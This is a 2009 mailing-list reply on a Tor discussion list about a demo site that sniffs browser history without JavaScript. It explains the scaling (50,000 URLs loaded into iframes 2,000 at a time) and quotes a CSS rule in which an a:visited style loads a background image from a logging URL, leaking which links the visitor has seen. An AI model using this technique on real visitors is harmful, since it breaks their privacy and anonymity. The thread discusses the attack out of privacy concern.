|
> Date: Sun, 14 Jun 2009 22:34:32 +0100 > From: my.green.lantern@xxxxxxxxxxxxxx > To: or-talk@xxxxxxxxxxxxx > Subject: Re: Stealing browser history without _javascript_ > > Matej Kovacic wrote: > > > > Seems to me it would have to have all websites known to man on the page it > > loads. If it looks at "visited links" css on the page it loads it could > > only look at websites on that page. It would have to store a lot of web > > pages on that hidden i-frame to really compare. Unless you are looking to > > see if a particular person visited a particular page doesn't seem like it > > would do anyone much good. There are 50000 URLs used: they are loaded into the Iframe 2000 at a time. e.g. http://www.making-the-web.com/misc/sites-you-visit/nojs/base.php?sess=xxxxx&from=49000 But yes it wuld be more useful for breaking the anonymity of a particular person who you had a known unique URL for. > > Zinco wrote: > In this IFrames exploit the test web page is said to have a css > background image embedded in it. I can find no such image (background: > #003399;). > (See http://www.w3schools.com/css/pr_background.asp.) The links each have their own style statement and a background called from log_base.php e.g. #l49871 a:visited{background:url(log_base.php?id=49871&sess=xxxxx); Windows Live™ SkyDrive™: Get 25 GB of free online storage. Get it on your BlackBerry or iPhone. |